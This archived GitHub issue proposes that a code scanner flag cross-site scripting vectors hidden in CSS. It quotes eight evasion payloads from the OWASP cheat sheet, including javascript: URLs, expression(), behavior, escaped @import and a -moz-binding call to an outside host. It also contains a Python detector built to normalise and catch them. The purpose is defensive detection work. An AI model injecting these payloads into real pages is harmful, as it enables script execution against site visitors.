This repository has been archived by the owner on Jul 20, 2018. It is now read-only.

Flag common XSS vectors in CSS and CSS files #255

Open
nickdaugherty opened this issue Mar 20, 2015 · 0 comments

Comments

@nickdaugherty
Contributor

XSS can come from CSS:

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<style>body{-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)}</style>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<DIV STYLE="width: expression(alert('XSS'));">
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">

In external and inline CSS, we should block:

  • <link> with href set to JS
  • style urls (like background) consisting of JS
  • usage of expression and behavior
  • @import set to JS

Note that comments in the CSS style can break normal detection - so we need to strip comments from the source first. Also, the word javascript can be broken up with slashes in some cases, which can defeat basic scanning.

Browser support for some of these is limited, but it's still worth catching.

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
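As an added illustration of the checks this issue asks for (this is example code written here, not the project's own scanner, and the rule names are made up for the example), the scanner below first normalises a CSS or HTML fragment the way a browser effectively would, by decoding HTML entities, stripping `/* ... */` comments, decoding CSS backslash escapes such as `\ja\vasc\ript`, and dropping ASCII control characters, and only then matches the four categories listed above (JavaScript in a `<link>` href, JavaScript in a style `url()`, `expression`/`behavior`, and `@import` of a JavaScript URL), plus `-moz-binding` from the vectors quoted in the issue. The sample inputs are the vectors from this issue and two constructed benign lines.

```python
import html
import re

# Strip /* ... */ comments; a comment can be used to split a keyword ("expr/*XSS*/ession").
COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# CSS backslash escapes: "\6a " (1-6 hex digits, optional trailing whitespace) or "\j" (any char).
CSS_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.DOTALL)
# ASCII control characters, which browsers ignore inside URLs ("url(&#1;javascript:...)").
CONTROL_RE = re.compile(r"[\x00-\x1f\x7f]")

# Detection rules, applied to the normalised (lower-cased) text. Rule names are hypothetical.
RULES = [
    ("link-javascript-href", re.compile(r"<link\b[^>]*\bhref\s*=\s*[\"']?\s*javascript:")),
    ("javascript-url", re.compile(r"url\(\s*[\"']?\s*javascript:")),
    ("import-javascript", re.compile(r"@import\s*[\"']?\s*javascript:")),
    ("expression", re.compile(r"\bexpression\s*\(")),
    ("behavior", re.compile(r"\bbehavior\s*:\s*url\(")),
    ("moz-binding", re.compile(r"-moz-binding\s*:")),
]


def _decode_escape(match):
    """Turn one CSS escape sequence into the character it stands for."""
    if match.group(1) is not None:
        codepoint = int(match.group(1), 16)
        return chr(codepoint) if codepoint <= 0x10FFFF else ""
    return match.group(2)


def normalize(src):
    """Canonicalise a CSS/HTML fragment so obfuscated keywords become literal."""
    text = html.unescape(src)                      # &#1; -> \x01, &quot; -> ", ...
    text = COMMENT_RE.sub("", text)                # expr/*XSS*/ession -> expression
    text = CSS_ESCAPE_RE.sub(_decode_escape, text) # \ja\vasc\ript -> javascript
    text = CONTROL_RE.sub("", text)                # drop \x01, tabs, newlines inside tokens
    return text.lower()


def scan(src):
    """Return the names of every rule that fires on the normalised input (empty list if clean)."""
    text = normalize(src)
    return [name for name, pattern in RULES if pattern.search(text)]


# Constructed sample inputs: the vectors quoted in this issue plus two benign lines.
SAMPLES = [
    r"""<LINK REL="stylesheet" HREF="javascript:alert('XSS');">""",
    r"""<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>""",
    r"""<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">""",
    r"""<style>body{-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss)}</style>""",
    r"""<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>""",
    r"""<DIV STYLE="width: expression(alert('XSS'));">""",
    r"""<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">""",
    r"""<XSS STYLE="behavior: url(xss.htc);">""",
    r"""body { background: url("/img/bg.png"); color: red; }""",
    r"""@import url("theme.css");""",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample) or "clean", "<-", sample)
```

Normalising before matching is what makes the comment-splitting and backslash-escape tricks mentioned above visible to plain pattern matching; a scanner that matches raw source would miss the `expr/*XSS*/ession` and `\ja\vasc\ript` forms entirely.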

@nickdaugherty nickdaugherty changed the title Flag common XSS vectors in CSS files Flag common XSS vectors in CSS and CSS files Mar 25, 2015